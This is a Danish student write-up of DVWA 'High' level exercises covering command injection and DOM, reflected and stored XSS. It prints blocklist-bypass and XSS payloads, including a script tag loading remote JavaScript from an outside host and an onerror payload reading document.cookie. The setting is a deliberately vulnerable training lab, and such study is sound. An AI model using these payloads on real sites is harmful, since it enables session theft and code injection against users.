# Command Injection

Ny sikkerhed:

- Ny blockliste
- "In the high level, the developer goes back to the drawing board and puts in even more pattern to match."

![alt text](../images/DVWAHigh/commandinjectionhighlevelblocklist.png)

Samt fjerner den alt whitespace.

Hvis vi går ind og kigger på help for dette niveau får vi:

 - "The developer has either made a slight typo with the filters and believes a certain PHP command will save them from this mistake."

Hvis vi kigger filterne igennem kan vi se at filteret for | er lidt anderledes, og har et mellemrum tilføjet.

Derfor, hvis vi laver en command der ikke bruger nogen mellemrum, ```1.1.1.1|ls``` får vi:

![alt text](../images/DVWAHigh/commandinjectionhighdone.png)

Refleksion: viser igen hvor vigtigt ordentligt input sanitering er.

# XSS (DOM)

Ny sikkerhed: white list for sprog, så det ikke er muligt at inject andet.
- "The developer is now white listing only the allowed languages."

Her indbringer vi konceptet om "URL fragments":

[OWASP](https://wiki.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001))

- [...] "everything after the # character is not treated as part of the query by the browser but as a fragment."

Da der ikke er andre sikkerhedsforanstaltninger end det, er der ikke behov for noget kompliceret:
- ```#<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>```

![alt text](../images/DVWAHigh/XSSDomHigh.png)

# XSS (Relfected)

Ny sikkerhed: pattern der leder efter ```<s*c*r*i*p*t"```

Dette er ikke rigtigt et problem da alle mine XSS i DOM øvelserne ikke bruger ```<SCRIPT>```, så nemt at tage en fra OWASP's Cheat Sheet.

- ```<IMG SRC=# onerror="alert(document.cookie)">```

![alt text](../images/DVWAHigh/XSSReflectedHighDone.png)

# XSS (Stored)

Ny sikkerhed: samme som i XSS (Reflected)

Her løb jeg ind i et problem, jeg kunne godt få XSS til at virke, ved bare at bruge den command fra tidligere opgave:

![alt text](../images/DVWAHigh/XSSStoredTEST.png)

Men ingen former for re-direct ville virke.
Hverken den fra medium level:

- ```<IMG SRC=/ onerror=window.location.replace("https://www.google.com")></img>```

Eller hvis jeg ændre den fra tidligere opgave:

-  ```<IMG SRC=# onerror=window.location.replace("https://www.google.com")> ```

Jeg prøvede at kigge rundt for at se om der var en guide, men alle dem jeg fandt opsatte ikke en redirect.

- https://www.stackzero.net/stored-xss-dvwa/
- https://blackhawkk.medium.com/cross-site-scripting-xss-dvwa-damn-vulnerable-web-applications-36808bff37b3
- https://ethicalhacs.com/dvwa-stored-xss-exploit/
- https://medium.com/@hashsleuth.info/exploiting-stored-xss-in-damn-vulnerable-web-application-dvwa-66f906dca355

Derfor ved jeg ikke hvordan jeg skal gå videre med den her opgave.